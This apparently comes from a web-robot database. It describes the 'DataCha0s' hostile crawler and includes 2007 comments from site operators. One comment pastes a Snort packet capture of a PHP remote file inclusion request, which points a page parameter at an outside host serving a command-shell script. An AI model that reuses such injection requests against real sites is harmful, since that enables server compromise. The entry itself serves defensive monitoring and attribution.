DataCha0s
Owner of the robot : unknown
Country : Brazil
Robot type : hostile robot
Description : A Brazilian web site claims the ownership of the DataCha0s robot. Acording to the site, the robot is operated by a group of young Brazilian hackers. They claim to have hacked 150 web sites. The robot is searching for security weaknesses in popular application.
User Agent transmitted to the visited web server :
- DataCha0s/2.0
Access control options understood by the robot :
- none
User Agent to use in the robots.txt file : unknown
URL’s for more information :
July 19th, 2007 at 2:52 pm
This robot seems to be doing PHP injection attacks as well. Snort packet capture:
07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1411345356 2713027245
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 http://www.warriormens
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca….
The content they’re trying to eject is clearly malicious:
Angels of Death > #AoD > irc.gigachat.net > CMD > File ListJuly 25th, 2007 at 4:39 pm
DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:
http://www.invasao.com.br/grupo04.htm
I’m seeing lots of different attacks. I assume some common code they’re sharing.